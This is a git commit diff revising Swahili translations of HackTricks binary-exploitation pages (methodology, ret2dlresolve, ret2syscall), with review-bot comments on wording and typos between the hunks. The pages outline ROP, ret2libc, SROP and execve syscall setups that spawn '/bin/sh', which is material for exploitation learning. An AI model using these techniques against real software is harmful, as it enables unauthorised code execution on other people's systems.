Translated ['binary-exploitation/basic-binary-exploitation-methodology/R

This commit is contained in:
Translator 2024-04-13 14:16:43 +00:00
parent 3fdc2b85bb
commit c5745636af
7 changed files with 289 additions and 65 deletions

View file

@ -709,7 +709,8 @@
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md)
* [Ret2syscall - ARM64](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md)
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md)
* [SROP - ARM64](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md)
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)
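Review bot: Moving the SROP entry from `srop-sigreturn-oriented-programming.md` to `srop-sigreturn-oriented-programming/README.md` changes a path that other pages link to, so every in-text `../srop-sigreturn-oriented-programming.md` reference has to be updated in the same commit; the methodology and ret2syscall hunks in this commit do that, but a new README is added without any visible deletion or redirect of the old `.md` file, so confirm the old path does not keep resolving to a stale duplicate of the page.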

View file

@ -8,7 +8,7 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
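Review bot: The shared sponsor banner is rewritten in different directions within this one commit: here "mkusanyiko wetu wa [**NFTs**] ya kipekee" becomes "mkusanyiko wetu wa kipekee wa [**NFTs**]", the ret2dlresolve file changes the same phrase to "... [**NFTs**] za kipekee", the ret2syscall file changes "wa kipekee wa [**NFTs**]" back to "[**NFTs**] ya kipekee", and the ARM64 file turns "za kipekee" into "ya kipekee". Pick one wording for the banner template and apply it to every page; otherwise each translation pass keeps flipping it and the diff noise hides the real content changes.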
@ -16,7 +16,7 @@ Njia nyingine za kusaidia HackTricks:
## Taarifa Msingi za ELF
Kabla ya kuanza kutumia udhaifu wowote, ni muhimu kuelewa sehemu ya muundo wa **binary ya ELF**:
Kabla ya kuanza kutumia udhaifu wowote ni muhimu kuelewa sehemu ya muundo wa **binary ya ELF**:
{% content-ref url="elf-tricks.md" %}
[elf-tricks.md](elf-tricks.md)
@ -30,7 +30,7 @@ Kabla ya kuanza kutumia udhaifu wowote, ni muhimu kuelewa sehemu ya muundo wa **
## Mbinu ya Kujaza Stack
Kwa mbinu nyingi ni vizuri kuwa na mpango ambapo kila mbinu itakuwa na manufaa. Kumbuka kuwa kinga sawa zitaathiri mbinu tofauti. Unaweza kupata njia za kuzidisha kinga kwenye kila sehemu ya kinga lakini sio katika mbinu hii.
Kwa mbinu nyingi ni vizuri kuwa na mpango ambapo kila mbinu itakuwa na manufaa. Kumbuka kuwa kinga sawa zitaathiri mbinu tofauti. Unaweza kupata njia za kuzidi kinga kwenye kila sehemu ya kinga lakini sio katika mbinu hii.
## Kudhibiti Mwelekeo
@ -39,10 +39,10 @@ Kuna njia tofauti unaweza kumaliza kudhibiti mwelekeo wa programu:
* [**Kujaza Stack**](../stack-overflow/) kwa kubadilisha kiashiria cha kurudi kutoka kwenye stack au EBP -> ESP -> EIP.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* Au kupitia **Andika Nini Wapi hadi Utekelezaji**
* [**Vidokezo vya Format**](../format-strings/)**:** Tumia `printf` kuandika yaliyomo yoyote kwenye anwani yoyote.
* [**Kuorodhesha Array**](../array-indexing.md): Tumia kiashiria kilichopangwa vibaya ili kuweza kudhibiti baadhi ya mizunguko na kupata andika isiyo na mpangilio.
* [**Vidokezo vya Format**](../format-strings/)**:** Tumia `printf` kuandika yaliyomo yoyote kwenye anwani za yoyote.
* [**Kuorodhesha Array**](../array-indexing.md): Tumia kiashiria kilichopangwa vibaya ili kuweza kudhibiti baadhi ya mizunguko na kupata andika yoyote.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* **bof hadi WWW kupitia ROP**: Tumia kujaza kijazo cha buffer kujenga ROP na kuweza kupata WWW.
* **bof hadi WWW kupitia ROP**: Tumia kujaza kijazo ili kujenga ROP na kuweza kupata WWW.
Unaweza kupata mbinu za **Andika Nini Wapi hadi Utekelezaji** katika:
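Review bot: "kuandika yaliyomo yoyote kwenye anwani za yoyote" looks like a typo introduced by this edit: the previous wording "anwani yoyote" (any address) was correct, and "za yoyote" leaves the connective "za" without a noun to attach to. Revert that phrase and keep the rest of the hunk (the "andika yoyote" and "kujaza kijazo" changes read fine).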
@ -52,50 +52,50 @@ Unaweza kupata mbinu za **Andika Nini Wapi hadi Utekelezaji** katika:
## Mizunguko Isiyokuwa na Mwisho
Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa kutosha** kutekeleza udanganyifu wa mafanikio, hasa baadhi ya kinga zinahitaji kuzidishwa. Kwa hivyo, ni muhimu kujadili chaguzi kadhaa za **kufanya udhaifu mmoja uweze kutumiwa mara kadhaa** katika utekelezaji huo wa binary:
Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa kutosha** kutekeleza udanganyifu wa mafanikio, hasa baadhi ya kinga zinahitaji kuzidiwa. Kwa hivyo, ni muhimu kujadili chaguzi kadhaa za **kufanya udhaifu mmoja uweze kutumiwa mara kadhaa** katika utekelezaji huo wa binary:
* Andika kwenye mnyororo wa **ROP** anwani ya **kazi ya msingi** au kwenye anwani ambapo **udhaifu** unatokea.
* Andika kwenye mnyororo wa **ROP** anwani ya **`main` function** au kwenye anwani ambapo **udhaifu** unatokea.
* Kwa kudhibiti mnyororo sahihi wa ROP unaweza kutekeleza vitendo vyote katika mnyororo huo
* Andika anwani ya **`exit` kwenye GOT** (au kazi nyingine inayotumiwa na binary kabla ya kumaliza) anwani ya kurudi **nyuma kwa udhaifu**
* Kama ilivyoelezwa katika [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)**,** hifadhi hapa 2 kazi, moja kuita udhaifu tena na nyingine kuita**`__libc_csu_fini`** ambayo itaita tena kazi kutoka `.fini_array`.
* Andika anwani ya **`exit` kwenye GOT** (au kazi nyingine yoyote inayotumiwa na binary kabla ya kumaliza) anwani ya kurudi **nyuma kwa udhaifu**
* Kama ilivyoelezwa katika [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)**,** hifadhi kumbukumbu 2 hapa, moja kuita udhaifu tena na nyingine kuita**`__libc_csu_fini`** ambayo itaita tena kazi kutoka `.fini_array`.
## Malengo ya Udukuzi
### lengo: Piga simu kwa Kazi Iliyopo
### Lengo: Piga simu kwa Kazi Iliyopo
* [**ret2win**](./#ret2win): Kuna kazi katika nambari unayohitaji kupiga simu (labda na baadhi ya parameta maalum) ili kupata bendera.
* Katika bof ya kawaida bila [**PIE**](../common-binary-protections-and-bypasses/pie/) **na** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) unahitaji tu kuandika anwani kwenye anwani ya kurudi iliyohifadhiwa kwenye stack.
* Katika bof na [**PIE**](../common-binary-protections-and-bypasses/pie/), utahitaji kuzidisha
* Katika bof na [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), utahitaji kuzidisha
* Katika **bof ya kawaida bila** [**PIE**](../common-binary-protections-and-bypasses/pie/) **na** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) unahitaji tu kuandika anwani kwenye anwani ya kurudi iliyohifadhiwa kwenye stack.
* Katika bof na [**PIE**](../common-binary-protections-and-bypasses/pie/), utahitaji kuzidi kinga hiyo
* Katika bof na [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), utahitaji kuzidi kinga hiyo
* Ikiwa unahitaji kuweka vigezo kadhaa kuita kazi ya **ret2win** kwa usahihi unaweza kutumia:
* Mnyororo wa [**ROP**](./#rop-and-ret2...-techniques) **ikiwa kuna vifaa vya kutosha** kuandaa vigezo vyote
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) (kwa hali unaweza kupiga simu hii) kudhibiti usajili mwingi
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (kwa hali unaweza kupiga simu hii ya mfumo) kudhibiti usajili mwingi
* Vifaa kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti usajili kadhaa
* Kupitia [**Andika Nini Wapi hadi Utekelezaji**](../arbitrary-write-2-exec/) unaweza kutumia udhaifu mwingine (si bof) kuita kazi ya **`ushindi`**.
* [**Kuhamisha Pointi**](../stack-overflow/pointer-redirecting.md): Kwa kesi stack ina pointi kwa kazi itakayoitwa au kwa herufi itakayotumiwa na kazi ya kuvutia (mfumo au printf), inawezekana kubadilisha anwani hiyo.
* Kupitia [**Andika Nini Wapi hadi Utekelezaji**](../arbitrary-write-2-exec/) unaweza kutumia udhaifu mwingine (si bof) kuita kazi ya **`win`**.
* [**Kuhamisha Pointi**](../stack-overflow/pointer-redirecting.md): Kwa kesi ambapo stack ina pointi kwa kazi itakayoitwa au kwa herufi itakayotumiwa na kazi ya kuvutia (mfumo au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Vigezo visivyo na thamani**](../stack-overflow/uninitialized-variables.md): Huwezi kujua.
* [**Vigezo visivyoanzishwa**](../stack-overflow/uninitialized-variables.md): Kamwe hujui.
### lengo: RCE
### Lengo: RCE
#### Kupitia shellcode, ikiwa nx imelemazwa au kuchanganya shellcode na ROP:
* [**(Stack) Shellcode**](./#stack-shellcode): Hii ni muhimu kuhifadhi shellcode kwenye stack kabla au baada ya kubadilisha kiashiria cha kurudi na kisha **kuhamia kwake** kuitekeleza:
* **Katika kesi yoyote, ikiwa kuna** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** katika bof ya kawaida utahitaji kuzidisha (kuvuja) hiyo
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) inawezekana kuhama kwenye anwani ya stack kwani haitabadilika kamwe
* **Na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) utahitaji mbinu kama [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) kuhama kwake
* **Na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), utahitaji kutumia baadhi ya [**ROP**](../rop-return-oriented-programing/) **kupiga simu kwa `memprotect`** na kufanya ukurasa fulani uwe `rwx`, ili kisha **hifadhi shellcode hapo** (kupiga simu kwa kusoma kwa mfano) na kisha hama hapo.
* [**(Stack) Shellcode**](./#stack-shellcode): Hii ni muhimu kuhifadhi shellcode kwenye stack kabla au baada ya kubadilisha kiashiria cha kurudi kisha **piga simu kwake** kuitekeleza:
* **Katika kesi yoyote, ikiwa kuna** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** katika bof ya kawaida utahitaji kuzidi (kuvuja) hiyo
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) inawezekana kusonga kwenye anwani ya stack kwani haitabadilika kamwe
* **Na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) utahitaji mbinu kama [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) kusonga kwake
* **Na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), utahitaji kutumia baadhi ya [**ROP**](../rop-return-oriented-programing/) **kupiga simu kwa `memprotect`** na kufanya ukurasa fulani uwe `rwx`, ili kisha **hifadhi shellcode hapo** (kupiga simu kwa kusoma kwa mfano) na kisha piga simu hapo.
* Hii itachanganya shellcode na mnyororo wa ROP.
#### Kupitia syscalls
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Inatumika kuita `execve` ili kuendesha amri za aina yoyote. Unahitaji kuweza kupata **gadgets za kuita syscall maalum na parameta**.
* Ikiwa [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) zimeanzishwa utahitaji kuzishinda **ili kutumia ROP gadgets** kutoka kwenye binary au maktaba.
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) inaweza kuwa na manufaa kwa kuandaa **ret2execve**
* Gadgets kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) ili kudhibiti baadhi ya rejista
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) inaweza kuwa na manufaa kwa kuandaa **ret2execve**
* Gadgets kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti baadhi ya rejista
#### Kupitia libc
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Inatumika kuita kazi kutoka kwenye maktaba (kawaida kutoka **`libc`**) kama vile **`system`** na baadhi ya hoja zilizoandaliwa (k.m. `'/bin/sh'`). Unahitaji binary ili **ipakie maktaba** na kazi unayotaka kuita (kawaida libc).
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Inatumika kuita kazi kutoka kwenye maktaba (kawaida kutoka kwa **`libc`**) kama vile **`system`** na baadhi ya hoja zilizoandaliwa (k.m. `'/bin/sh'`). Unahitaji binary ili **ipakie maktaba** na kazi unayotaka kuita (kawaida libc).
* Ikiwa **imekompiliwa tuli na hakuna** [**PIE**](../common-binary-protections-and-bypasses/pie/), **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na kujua toleo la libc** lililopakiwa, **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* Ikiwa kuna [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **lakini hakuna** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, kwa kujua libc na binary ikitumia kazi ya `system`** ni rahisi **`ret` kwenye anwani ya system kwenye GOT** na anwani ya `'/bin/sh'` kwenye parameta (utahitaji kufikiria hili).
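Review bot: Both the old and the new nx bullet name the syscall `memprotect`; the function is `mprotect`, which is how the hint in the ret2syscall page of this same commit spells it, so fix the identifier while this line is being touched. Three smaller points in the same hunk: "**`main` function**" mixes English into a Swahili sentence where the page otherwise says "kazi" (the old "kazi ya msingi" was at least consistent; "kazi ya **`main`**" keeps both the identifier and the language); the .fini_array bullet now reads "hifadhi kumbukumbu 2 hapa" (store 2 memory entries) although the sentence goes on to describe two functions, one re-triggering the vuln and one calling `__libc_csu_fini`, so the old noun "kazi" was the right one; and the unchanged syscall bullet still says "kuzishinda" for bypassing ASLR/PIE while the rest of this commit standardizes on "kuzidi".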
@ -110,18 +110,18 @@ Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa
#### Kupitia EBP/RBP
* [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Dhibiti ESP ili kudhibiti RET kupitia EBP iliyohifadhiwa kwenye steki.
* Ina manufaa kwa **kuzidi kidogo** kwenye mlipuko wa steki
* Ina manufaa kama njia mbadala ya kumaliza kudhibiti EIP wakati wa kutumia EIP kujenga mzigo wa data kwenye kumbukumbu na kisha kuruka kwenda kwake kupitia EBP
* Ina manufaa kwa mifumo ya steki yenye **makosa ya kimo cha moja**
* Ina manufaa kama njia mbadala ya kumaliza kudhibiti EIP wakati unatumia EIP kujenga mzigo wa data kwenye kumbukumbu na kisha kusonga kwenda kwake kupitia EBP
#### Mambo Mengine
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): Kwenye hali ambapo steki ina pointa kwenye kazi itakayoitwa au kwenye herufi itakayotumiwa na kazi ya kuvutia (kama vile system au printf), inawezekana kubadilisha anwani hiyo.
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): Ikiwa steki ina pointa kwenye kazi itakayoitwa au kwenye herufi itakayotumiwa na kazi ya kuvutia (kama vile system au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Variables zisizowekwa**](../stack-overflow/uninitialized-variables.md): Kamwe hujui
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
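Review bot: The same two links get different titles within this one page: [**Pointers Redirecting**] is left in English here while the ret2win section above translates the identical link as [**Kuhamisha Pointi**], and the unchanged bullet [**Variables zisizowekwa**] uses a different term from the [**Vigezo visivyoanzishwa**] wording this commit introduces a few lines earlier. Align both titles with the ret2win section, and give the "Variables" bullet the same trailing text and punctuation as its sibling ("Kamwe hujui." with the period).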

View file

@ -7,8 +7,8 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
@ -18,14 +18,14 @@ Njia nyingine za kusaidia HackTricks:
Kama ilivyoelezwa kwenye ukurasa kuhusu [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) na [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries bila Full Relro zitaresolve alama (kama vile anwani za maktaba za nje) mara ya kwanza wanapotumiwa. Urekebishaji huu hufanyika kwa kuita kazi **`_dl_runtime_resolve`**.
Kazi ya **`_dl_runtime_resolve`** inachukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili **kuresolve** alama iliyotajwa.
Kazi ya **`_dl_runtime_resolve`** huchukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili **kuresolve** alama iliyotajwa.
Hivyo basi, niwezekanavyo kufanya **miundo yote hii feki** ili kufanya urekebishaji wa kiungo cha kudumu kutatue alama iliyotakiwa (kama vile kazi ya **`system`**) na kuipiga na parameta iliyowekwa (k.m. **`system('/bin/sh')`**).
Hivyo basi, niwezekanavyo kufanya **miundo yote hii feki** ili kufanya urekebishaji wa kiungo cha kudumu kutatua alama iliyotakiwa (kama vile kazi ya **`system`**) na kuipiga kwa kiparameta kilichowekwa (k.m. **`system('/bin/sh')`**).
Kawaida, miundo yote hii hufanywa feki kwa kutengeneza **mnyororo wa ROP wa awali unaopiga simu kwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **miundo** na neno **`'/bin/sh'`** hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kusoma kwenye eneo lililofahamika, na kisha mnyororo wa ROP unaendelea kwa kupiga simu **`_dl_runtime_resolve`**, ikimruhusu **kutatua anwani ya `system`** kwenye miundo feki na **kupiga simu kwa anwani hii** na anwani ya `$'/bin/sh'`.
Kawaida, miundo yote hii hufanywa feki kwa kutengeneza **mtandao wa ROP wa awali unaopiga simu kwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **miundo** na neno **`'/bin/sh'`** hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kusoma kwenye eneo lililofahamika, na kisha mtandao wa ROP unaendelea kwa kupiga simu **`_dl_runtime_resolve`**, ikimruhusu **kutatua anwani ya `system`** kwenye miundo feki na **kupiga simu kwa anwani hii** na anwani ya `$'/bin/sh'`.
{% hint style="success" %}
Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv/) au [SROP](srop-sigreturn-oriented-programming.md)) na hakuna njia za kuvuja anwani za libc.
Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv/) au [SROP](srop-sigreturn-oriented-programming/)) na hakuna njia za kuvuja anwani za libc.
{% endhint %}
Unaweza kupata maelezo bora kuhusu mbinu hii katika nusu ya pili ya video:
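Review bot: Changing "mnyororo wa ROP" to "mtandao wa ROP" turns "ROP chain" into "ROP network"; "mnyororo" is the term used everywhere else in this commit (the eternal-loop bullets of the methodology page and the "Kiotomatiki ROP mnyororo" section of the ret2syscall page), so revert it here and in the example intro of this file. Also, "niwezekanavyo" in the sentence about faking the structures is carried over unchanged on a modified line and reads like a typo for "inawezekana"; since the line is being rewritten anyway, fix it in the same hunk.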
@ -39,16 +39,16 @@ Ni lazima kufanya feki miundo 3: **`JMPREL`**, **`STRTAB`** na **`SYMTAB`**. Una
## Muhtasari wa Shambulio
1. Andika miundo feki mahali fulani
2. Weka hoja ya kwanza ya system (`$rdi = &'/bin/sh'`)
2. Weka hoja ya kwanza ya mfumo (`$rdi = &'/bin/sh'`)
3. Weka kwenye steki anwani za miundo kupiga simu **`_dl_runtime_resolve`**
4. Piga simu **`_dl_runtime_resolve`**
4. Piga simu kwa **`_dl_runtime_resolve`**
5. **`system`** itatauliwa na kupigwa simu na `'/bin/sh'` kama hoja
## Mfano
### Pure Pwntools
Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ukiwa na maelezo mazuri sana ya mnyororo wa mwisho wa ROP**, lakini hapa ni shambulio la mwisho lililotumika:
Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ukiwa na maelezo mazuri sana ya mtandao wa mwisho wa ROP**, lakini hapa ni shambulio la mwisho lililotumika:
```python
from pwn import *
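Review bot: Step 2 of the attack summary now says "hoja ya kwanza ya mfumo", translating the function name `system` as "the system"; it is the `system` identifier (step 5 and the code keep it as **`system`**), so it must stay untranslated in code font. The example intro in the same hunk also switches "mnyororo wa mwisho wa ROP" to "mtandao wa mwisho wa ROP" (ROP network); "mnyororo" (chain) is the term used elsewhere in this commit, so keep it.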
@ -178,4 +178,4 @@ target.interactive()
* [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
* [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
* [https://guyinatuxedo.github.io/18-ret2\_csu\_dl/0ctf18\_babystack/index.html](https://guyinatuxedo.github.io/18-ret2\_csu\_dl/0ctf18\_babystack/index.html)
* 32bit, hakuna relro, hakuna canary, nx, hakuna pie, msingi wa kujaza buffer na kurejea. Kudanganya, bof hutumiwa kuita `read` tena na sehemu ya `.bss` na ukubwa mkubwa, kuhifadhi `dlresolve` bandia meza za kupakia `system`, kurudi kwa msingi na kutumia tena bof ya awali kuita dlresolve na kisha `system('/bin/sh')`.
* 32bit, hakuna relro, hakuna canary, nx, hakuna pie, msingi wa kujaza buffer na kurejea. Kuitumia, bof inatumika kuita `read` tena na sehemu ya `.bss` na ukubwa mkubwa, kuhifadhi kwenye meza deepfake za `dlresolve` ili kupakia `system`, kurudi kwa msingi na kutumia tena bof ya awali kuita dlresolve na kisha `system('/bin/sh')`.
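Review bot: "meza deepfake za `dlresolve`" replaces the plain "bandia" (fake) with the loanword "deepfake", which means something else (synthetic media) and will confuse readers; "meza bandia za `dlresolve`" is the right wording for the fake resolver tables. The rest of the rewrite ("Kudanganya" to "Kuitumia", "kuhifadhi kwenye meza") reads fine.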

View file

@ -2,38 +2,38 @@
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Hii inafanana na Ret2lib, hata hivyo, katika kesi hii hatutaita kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa tayari kuita syscall `sys_execve` na baadhi ya hoja kutekeleza `/bin/sh`. Mbinu hii kawaida hutekelezwa kwenye faili za binary ambazo zimekamilishwa kwa njia ya static, hivyo kunaweza kuwa na vifaa vingi na maagizo ya syscall.
Hii inafanana na Ret2lib, hata hivyo, katika kesi hii hatutaita kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa tayari kuita syscall `sys_execve` na baadhi ya hoja kutekeleza `/bin/sh`. Mbinu hii kawaida hutekelezwa kwenye faili za binary ambazo zimekamilishwa kistatiki, hivyo kunaweza kuwa na vifaa vingi na maagizo ya syscall.
Ili kuandaa wito kwa **syscall** ni muhimu kuwa na usanidi ufuatao:
Ili kuandaa wito kwa **syscall** inahitajika usanidi ufuatao:
* `rax: 59 Taja sys_execve`
* `rdi: ptr kwa "/bin/sh" taja faili ya kutekeleza`
* `rsi: 0 taja hakuna hoja zilizopitishwa`
* `rdx: 0 taja hakuna mazingira ya mazingira yaliyopitishwa`
Kwa hivyo, kimsingi ni muhimu kuandika mfuatano wa herufi `/bin/sh` mahali fulani na kisha kutekeleza `syscall` (ukiwa makini na kujaza inayohitajika kudhibiti steki). Kwa hili, tunahitaji kifaa cha kuandika `/bin/sh` katika eneo lililofahamika.
Kwa hivyo, kimsingi ni lazima kuandika mfuatano `/bin/sh` mahali fulani na kisha kutekeleza `syscall` (ukiwa makini na kujaza inayohitajika kudhibiti steki). Kwa hili, tunahitaji kifaa cha kuandika `/bin/sh` katika eneo lililojulikana.
{% hint style="success" %}
